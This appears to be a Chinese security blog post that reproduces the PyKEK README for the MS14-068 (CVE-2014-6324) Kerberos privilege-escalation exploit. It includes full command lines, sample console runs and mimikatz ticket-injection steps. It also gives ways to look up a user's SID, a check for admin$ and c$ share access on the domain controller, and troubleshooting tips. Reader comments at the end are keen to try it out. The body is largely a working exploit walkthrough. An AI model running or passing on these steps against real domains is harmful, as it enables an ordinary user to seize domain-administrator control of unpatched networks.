数日前 安全脉搏播报了《MS14-068 Kerberos Domain Privilege Escalation》,安全运维和渗透师必关注的一个漏洞,该漏洞可能允许攻击者提升普通域用户账户为域管理员账户。
PyKEK (Python Kerberos Exploitation Kit), a python library to manipulate KRB5-related data. (Still in development)
For now, only a few functionalities have been implemented (in a quite Quick'n'Dirty way) to exploit MS14-068 (CVE-2014-6324) .
More is coming...
Sylvain Monné
Contact : sylvain dot monne at solucom dot fr
Special thanks to: Benjamin DELPY gentilkiwi
Exploits MS14-680 vulnerability on an un-patched domain controler of an Active Directory domain to get a Kerberos ticket for an existing domain user account with the privileges of the following domain groups :
USAGE: ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr> OPTIONS: -p <clearPassword> --rc4 <ntlmHash>
root@kali:~/sploit/pykek# python ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc
[+] Building AS-REQ for dc-a-2003.dom-a.loc... Done!
[+] Sending AS-REQ to dc-a-2003.dom-a.loc... Done!
[+] Receiving AS-REP from dc-a-2003.dom-a.loc... Done!
[+] Parsing AS-REP from dc-a-2003.dom-a.loc... Done!
[+] Building TGS-REQ for dc-a-2003.dom-a.loc... Done!
[+] Sending TGS-REQ to dc-a-2003.dom-a.loc... Done!
[+] Receiving TGS-REP from dc-a-2003.dom-a.loc... Done!
[+] Parsing TGS-REP from dc-a-2003.dom-a.loc... Done!
[+] Creating ccache file 'TGT_user-a-1@dom-a.loc.ccache'... Done!
root@kali:~/sploit/pykek# mv TGT_user-a-1@dom-a.loc.ccache /tmp/krb5cc_0
python.exe ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc
mimikatz.exe "kerberos::ptc TGT_user-a-1@dom-a.loc.ccache" exit
1)wmic useraccount where name="USERNAME" get sid
2)whoami /all 本机可以直接查出自己的SID;
胖编想 在未及时patch的内网内是不是要如鱼得水 随意穿插呢?那么内网渗透门槛又被拉低了?
Update: 1) use ms14-068.py ms14-068.py -u secpulse@secpulse.local -s S-1-5-21-3653881884-3918934852-1693569208-8965 -d DC2.secpulse.local Password: [+] Building AS-REQ for DC2.secpulse.local... Done! [+] Sending AS-REQ to DC2.secpulse.local... Done! [+] Receiving AS-REP from DC2.secpulse.local... Done! [+] Parsing AS-REP from DC2.secpulse.local... Done! [+] Building TGS-REQ for DC2.secpulse.local... Done! [+] Sending TGS-REQ to DC2.secpulse.local... Done! [+] Receiving TGS-REP from DC2.secpulse.local... Done! [+] Parsing TGS-REP from DC2.secpulse.local... Done! [+] Creating ccache file 'TGT_secpulse@secpulse.local.ccache'... Done! 2)put your TGT_secpulse@secpulse.local.ccache file into mimikatz directory 最新版本的mimikatz才支持kerberos::ptc模块,下载地址: https://github.com/gentilkiwi/mimikatz/releases/tag/2.0.0-alpha-20141120 否则会出现 ERROR mimikatz_doLocal ; "ptc" command of "kerberos" module not found ! 3)新版本执行 mimikatz.exe log "kerberos::ptc TGT_secpulse@secpulse.local.ccache" exit Using 'mimikatz.log' for logfile : OK mimikatz(commandline) # kerberos::ptc TGT_secpulse@secpulse.local.ccache Principal : (01) : secpulse ; @ SECPULSE.LOCAL Data 0 Start/End/MaxRenew: 2014/12/7 9:43:01 ; 2014/12/7 19:43:01 ; 2014/12/14 9:43:01 Service Name (01) : krbtgt ; SECPULSE.LOCAL ; @ SECPULSE.LOCAL Target Name (01) : krbtgt ; SECPULSE.LOCAL ; @ SECPULSE.LOCAL Client Name (01) : secpulse ; @ SECPULSE.LOCAL Flags 50a10000 : name_canonicalize ; pre_authent ; renewable ; proxiable ; forwardable ; Session Key : 0x00000017 - rc4_hmac_nt 1af2c0401238d0346b5456788atf1140 Ticket : 0x00000000 - null ; kvno = 2 [...] * Injecting ticket : OK mimikatz(commandline) # exit Bye! 4)如果injecte成功 你有可能获得到了域管理session 那么klist看一下是否有了kerberos Ticket 那么 测试一下 net use \\DC2.secpulse.local\admin$ //注:使用IP可能会失败 dir \\DC2.secpulse.local\c$ 看看有木有权限 好运~ 备注: 测试环境: win7,在xp下mimikatz会出错 python2.7,使用更高版本比如python3.3脚本会报错 在本机以local admin登录,如果以域用户登录提权会失败 如果在以上操作下仍然失败,建议重启主机,并用域管理员在域内新建普通用户,以新建用户的用户名密码执行python脚本,重复以上流程
老外这篇是以 local admin(not with AD domain credentials)登陆的,成功获得域控机器权限。
这个叼炸天 找个环境实践下先
@xiao_hen 若若若